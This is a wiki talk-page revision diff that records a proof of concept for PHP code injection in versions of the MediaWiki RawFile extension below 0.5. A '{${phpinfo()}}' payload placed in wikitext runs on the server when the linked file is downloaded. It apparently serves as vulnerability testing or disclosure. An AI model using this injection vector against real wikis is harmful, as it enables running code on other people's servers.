Difference between revisions of "Talk:Mediawiki RawFile"
Jump to navigation
Jump to search
m |
|||
| (3 intermediate revisions by one other user not shown) | |||
| Line 1: | Line 1: | ||
| + | Testing PHP code injection on Rawfile < 0.5 : |
||
| − | Tests... |
||
| + | <br>Adding this code to a wikipage: |
||
| − | |||
| + | <pre> |
||
| − | <nowiki>{${ |
+ | <nowiki><nowiki>{${phpinfo()}}</nowiki></nowiki> |
[{{#file: myscript.sh}} as myscript.sh] |
[{{#file: myscript.sh}} as myscript.sh] |
||
<source lang=bash> |
<source lang=bash> |
||
| Line 9: | Line 10: | ||
exit 0 |
exit 0 |
||
</source> |
</source> |
||
| + | </pre> |
||
| + | and trying to download myscript.sh will execute phpinfo() on the server. |
||
Latest revision as of 17:03, 13 February 2014
Testing PHP code injection on Rawfile < 0.5 :
Adding this code to a wikipage:
<nowiki>{${phpinfo()}}</nowiki>
[{{#file: myscript.sh}} as myscript.sh]
<source lang=bash>
#!/bin/bash
echo 'Hello world!'
exit 0
</source>
and trying to download myscript.sh will execute phpinfo() on the server.